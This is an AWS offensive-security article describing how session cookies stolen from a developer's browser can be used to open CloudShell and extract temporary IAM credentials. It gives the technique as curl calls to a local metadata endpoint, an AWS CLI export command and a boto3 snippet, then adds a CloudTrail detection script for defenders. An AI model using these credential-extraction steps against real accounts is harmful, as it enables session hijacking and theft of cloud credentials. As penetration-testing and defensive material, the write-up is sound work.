Article by Nick Frichette
Get IAM Credentials from a Console Session
Original Research
When performing a penetration test or red team assessment, it is not uncommon to gain access to a developer's machine. This presents an opportunity for you to jump into AWS infrastructure via credentials on the system. For a myriad of reasons you may not have access to credentials in the .aws folder, but instead have access to their browser's session cookies (for example via cookies.sqlite in Firefox).
Gaining access to the Console is great, but it may not be ideal. You may want to use certain tools that would instead require IAM credentials.
To get around this, we can leverage CloudShell. CloudShell exposes IAM credentials via an undocumented endpoint on port 1338. After loading session cookies from the victim into your browser, you can navigate to CloudShell and issue the following commands to get IAM credentials.
[user@cloudshell]$ TOKEN=$(curl -X PUT localhost:1338/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 60")
[user@cloudshell]$ curl localhost:1338/latest/meta-data/container/security-credentials -H "X-aws-ec2-metadata-token: $TOKEN"
Alternatively, you can run the following command, which returns credentials with a short TTL (roughly 15 minutes).
[user@cloudshell]$ aws configure export-credentials --format env
Using boto3 to Retrieve Credentials
Alternatively, you can use Python's boto3 library directly within CloudShell to programmatically retrieve the credentials. This method can be useful when you need to integrate credential extraction into a Python script or automation workflow.
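import boto3

# boto3 resolves the CloudShell session's credentials through its default provider chain
session = boto3.Session()
creds = session.get_credentials()

# Temporary credentials: access key, secret key and session token
print({
    'AccessKey': creds.access_key,
    'SecretKey': creds.secret_key,
    'Token': creds.token
})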
This approach leverages boto3's automatic credential detection within the CloudShell environment, providing the same temporary credentials that are available through the metadata service endpoint. The credentials obtained this way will have the same TTL limitations as other methods described above.
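For defenders, one way to look for the scenario above (console session cookies replayed from another machine, followed by CloudShell use) in CloudTrail. This is an added example, not code from the original article. It assumes that CloudShell API calls are logged under the event source cloudshell.amazonaws.com with the browser's source IP and that a console session lasts at most 12 hours; the log records and the helper names are constructed for illustration.

```python
from datetime import datetime, timedelta

# Assumed maximum console session lifetime; set this to your account's value.
SESSION_WINDOW = timedelta(hours=12)

def _when(event):
    return datetime.strptime(event["eventTime"], "%Y-%m-%dT%H:%M:%SZ")

def find_suspect_cloudshell_use(events, window=SESSION_WINDOW):
    """Return CloudShell events with no successful ConsoleLogin by the same
    principal from the same source IP inside the preceding window."""
    logins = {}    # (principal ARN, source IP) -> times of successful logins
    suspects = []
    for event in sorted(events, key=_when):
        key = (event.get("userIdentity", {}).get("arn"), event.get("sourceIPAddress"))
        source, name = event.get("eventSource"), event.get("eventName")
        if source == "signin.amazonaws.com" and name == "ConsoleLogin":
            if (event.get("responseElements") or {}).get("ConsoleLogin") == "Success":
                logins.setdefault(key, []).append(_when(event))
        elif source == "cloudshell.amazonaws.com":
            if not any(_when(event) - t <= window for t in logins.get(key, [])):
                suspects.append(event)
    return suspects

def _rec(time, source, name, user, ip, ok=None):
    # Builds a constructed record with only the fields the check reads.
    return {"eventTime": time, "eventSource": source, "eventName": name,
            "userIdentity": {"arn": "arn:aws:iam::111122223333:user/" + user},
            "sourceIPAddress": ip,
            "responseElements": {"ConsoleLogin": ok} if ok else None}

# Constructed sample records, not real log data (documentation IP ranges).
SAMPLE_EVENTS = [
    _rec("2024-01-10T09:00:00Z", "signin.amazonaws.com", "ConsoleLogin", "alice", "198.51.100.10", "Success"),
    _rec("2024-01-10T09:05:00Z", "cloudshell.amazonaws.com", "CreateSession", "alice", "198.51.100.10"),
    _rec("2024-01-10T10:30:00Z", "cloudshell.amazonaws.com", "CreateSession", "alice", "203.0.113.77"),
]

if __name__ == "__main__":
    for e in find_suspect_cloudshell_use(SAMPLE_EVENTS):
        print(e["eventTime"], e["userIdentity"]["arn"], e["sourceIPAddress"])
```

Users who change networks mid-session (VPN, mobile tethering) will also match, so treat hits as leads to correlate with user agent and subsequent API activity rather than as confirmed compromise.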